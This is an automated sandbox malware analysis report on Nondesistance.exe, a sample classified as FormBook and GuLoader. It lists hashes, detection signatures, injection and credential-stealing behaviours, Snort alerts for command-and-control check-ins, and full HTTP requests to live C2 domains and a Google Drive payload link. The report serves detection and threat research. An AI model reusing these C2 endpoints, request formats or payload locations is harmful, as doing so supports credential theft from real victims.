Windows Analysis Report
Nondesistance.exe

Overview

General Information

Sample name:	Nondesistance.exe
Analysis ID:	1447915
MD5:	9695b61f42f2e5a77e2e8d29963fe980
SHA1:	92396f929ffc0ec1c2929dcba7fa2b3de5859bc0
SHA256:	1c6b868bda50a13de084c97460436742b1636b75e60708eeecb9c44d574ccce9
Infos:

Detection

FormBook, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected FormBook

Yara detected GuLoader

Found direct / indirect Syscall (likely to bypass EDR)

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to read the PEB

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/ https://asec.ahnlab.com/en/32149/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Nondesistance.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://www.donantedeovulos.space/udud/	Avira URL Cloud: Label: malware
Source: http://www.donantedeovulos.space/udud/?Pl9P8ldX=TI4e2mgRGjDzVtc2Q6Py5bwpcc1eb12gZ0duId/eBRBY8c2YNmrJo+kJDCAf1WNWS12prRY8Wfa6UPEwF5qWDHqXkvXCbknW9nAX9azEcXWIpZdV+y5+rBk=&UJ2H=ED2dW8S8UxwlG	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: Nondesistance.exe	ReversingLabs: Detection: 50%
Source: Nondesistance.exe	Virustotal: Detection: 56%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 0000000B.00000002.25033531702.0000000004910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.20405040501.00000000321A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.25033303278.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.25030471443.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.25029850755.0000000002AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.25034036659.00000000042F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.20405923409.0000000034610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Uses 32bit PE files

Source: Nondesistance.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 142.251.16.101:443 -> 192.168.11.30:49827 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.253.62.132:443 -> 192.168.11.30:49828 version: TLS 1.2

Source: Nondesistance.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: write.pdbGCTL source: Nondesistance.exe, 00000009.00000002.20393067767.00000000021CB000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000002.20393067767.00000000021D5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: write.pdb source: Nondesistance.exe, 00000009.00000002.20393067767.00000000021CB000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000002.20393067767.00000000021D5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdb source: Nondesistance.exe, 00000009.00000001.20120981057.0000000000649000.00000020.00000001.01000000.00000009.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25033001346.0000000000C3E000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: wntdll.pdbUGP source: Nondesistance.exe, 00000009.00000003.20300365198.000000003216B000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20303958082.0000000032316000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000002.25033905164.0000000004B7D000.00000040.00001000.00020000.00000000.sdmp, write.exe, 0000000B.00000003.20394487085.00000000048A1000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000003.20391249832.00000000046FE000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000002.25033905164.0000000004A50000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Nondesistance.exe, Nondesistance.exe, 00000009.00000003.20300365198.000000003216B000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20303958082.0000000032316000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000002.25033905164.0000000004B7D000.00000040.00001000.00020000.00000000.sdmp, write.exe, 0000000B.00000003.20394487085.00000000048A1000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000003.20391249832.00000000046FE000.00000004.00000020.00020000.00000000.sdmp, write.exe, 0000000B.00000002.25033905164.0000000004A50000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdbUGP source: Nondesistance.exe, 00000009.00000001.20120981057.0000000000649000.00000020.00000001.01000000.00000009.sdmp

Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 4_2_00406033 FindFirstFileA,FindClose,	4_2_00406033
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 4_2_004055D1 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	4_2_004055D1
Source: C:\Users\user\Desktop\Nondesistance.exe	Code function: 4_2_00402688 FindFirstFileA,	4_2_00402688

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	Code function: 4x nop then pop edi	10_2_00603851
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	Code function: 4x nop then mov esp, ebp	10_2_00601267
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	Code function: 4x nop then pop ebx	10_2_0060322B
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	Code function: 4x nop then xor eax, eax	10_2_00606AD0
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	Code function: 4x nop then mov esp, ebp	10_2_006012BF
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	Code function: 4x nop then pop edi	10_2_00602550
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	Code function: 4x nop then pop edi	10_2_006025AE
Source: C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe	Code function: 4x nop then pop edi	10_2_00602580

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49829 -> 208.112.85.150:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49831 -> 79.98.25.1:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49832 -> 79.98.25.1:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49834 -> 79.98.25.1:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49835 -> 64.190.62.22:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49836 -> 64.190.62.22:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49838 -> 64.190.62.22:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49839 -> 3.73.27.108:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49840 -> 3.73.27.108:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49842 -> 3.73.27.108:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49843 -> 203.161.49.193:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49844 -> 203.161.49.193:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49846 -> 203.161.49.193:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49847 -> 91.195.240.123:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49848 -> 91.195.240.123:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49850 -> 91.195.240.123:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49851 -> 183.111.161.243:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49852 -> 183.111.161.243:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49854 -> 183.111.161.243:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49855 -> 3.64.163.50:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49856 -> 3.64.163.50:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49858 -> 3.64.163.50:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49859 -> 217.70.184.50:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49860 -> 217.70.184.50:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49862 -> 217.70.184.50:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49863 -> 91.195.240.123:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49864 -> 91.195.240.123:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49866 -> 91.195.240.123:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49867 -> 84.32.84.32:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49868 -> 84.32.84.32:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49870 -> 84.32.84.32:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49875 -> 147.92.36.247:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49876 -> 147.92.36.247:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49878 -> 147.92.36.247:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49879 -> 208.112.85.150:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49880 -> 79.98.25.1:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49881 -> 79.98.25.1:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49883 -> 79.98.25.1:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49884 -> 64.190.62.22:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49885 -> 64.190.62.22:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49887 -> 64.190.62.22:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49888 -> 3.73.27.108:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49889 -> 3.73.27.108:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49891 -> 3.73.27.108:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49892 -> 203.161.49.193:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49893 -> 203.161.49.193:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49895 -> 203.161.49.193:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49896 -> 91.195.240.123:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49897 -> 91.195.240.123:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49899 -> 91.195.240.123:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49900 -> 183.111.161.243:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49901 -> 183.111.161.243:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49903 -> 183.111.161.243:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49904 -> 3.64.163.50:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49905 -> 3.64.163.50:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49907 -> 3.64.163.50:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49908 -> 116.203.164.244:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49909 -> 116.203.164.244:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49911 -> 116.203.164.244:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49912 -> 185.215.4.19:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49913 -> 185.215.4.19:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49915 -> 185.215.4.19:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49920 -> 76.223.67.189:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.30:49921 -> 76.223.67.189:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49923 -> 76.223.67.189:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49924 -> 208.112.85.150:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49925 -> 79.98.25.1:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49926 -> 64.190.62.22:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49927 -> 3.73.27.108:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49928 -> 203.161.49.193:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49929 -> 91.195.240.123:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49930 -> 183.111.161.243:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49931 -> 3.64.163.50:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49932 -> 203.161.49.193:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49933 -> 185.253.215.17:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49934 -> 3.64.163.50:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49936 -> 208.112.85.150:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.30:49937 -> 208.112.85.150:80

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 208.112.85.150 208.112.85.150
Source: Joe Sandbox View	IP Address: 79.98.25.1 79.98.25.1
Source: Joe Sandbox View	IP Address: 84.32.84.32 84.32.84.32

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: LNH-INCUS LNH-INCUS
Source: Joe Sandbox View	ASN Name: RACKRAYUABRakrejusLT RACKRAYUABRakrejusLT
Source: Joe Sandbox View	ASN Name: NTT-LT-ASLT NTT-LT-ASLT
Source: Joe Sandbox View	ASN Name: NBS11696US NBS11696US

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1SoBWlxXWVZs3OQ__EvL5oLC5wlw_7PLm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1SoBWlxXWVZs3OQ__EvL5oLC5wlw_7PLm&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /udud/?Pl9P8ldX=FIraThNO5niOHukbO1r8qSNysm+mJ2OOQaLhh3AktbepBJXcjCIQ5u+D5oIg7MUCVA/ZghdlXch7ulyeg4ZZkVaM25CfsdbY6Ciec8CSMOWGBD2e85VJ6eo=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.fivetownsjcc.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Source: global traffic	HTTP traffic detected: GET /udud/?Pl9P8ldX=+7vgIBjJEgFzVABnblxNZlxcXvtVnPO976cESSRxKNf7HePF9jiwkaXwYbYPT+M2gd9LCxRObe8L7kEVgXr7yG5qgAvgbam/iSwlpjMS4ArI2Mt4ChGP5d0=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.maxiwalls.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Source: global traffic	HTTP traffic detected: GET /udud/?Pl9P8ldX=TI4e2mgRGjDzVtc2Q6Py5bwpcc1eb12gZ0duId/eBRBY8c2YNmrJo+kJDCAf1WNWS12prRY8Wfa6UPEwF5qWDHqXkvXCbknW9nAX9azEcXWIpZdV+y5+rBk=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.donantedeovulos.spaceAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Source: global traffic	HTTP traffic detected: GET /udud/?Pl9P8ldX=hGFabcFIFCLvltCtmr9HP7OROVYI8jz1wRRIKEqq2n4QXlxpqgeqG0CRvdN+pVKSvdVheptlxRG17ghg7M8WhiuOrvxilzcVqEvqLqvxpfLmNTwCuTHyXsI=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.valentinaetommaso.itAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Source: global traffic	HTTP traffic detected: GET /udud/?Pl9P8ldX=PsObB6+xPBRyZVNIbCvU2WSZgkCw8khE9p6p1fw7XNSxe8fb3H1JBnahW35XlkcpsNyADYDExmr6dQQdFworvtXhDNQSnK6hOqfzO1lUJ+gi+DatEY0x4VA=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.funtechie.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Source: global traffic	HTTP traffic detected: GET /udud/?Pl9P8ldX=pl+m+RwhDilgNhV8y9np651oviBSsBUAcSsMU8DJXuQO/zLKreqMvauOXyOp2DyQLR+zvzGH9k4G3Xo0zK83IFFyM0D1vpL10/nbh1uWm09odGxnF4xzrfg=&UJ2H=ED2dW8S8UxwlG HTTP/1.1Host: www.l7aeh.usAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
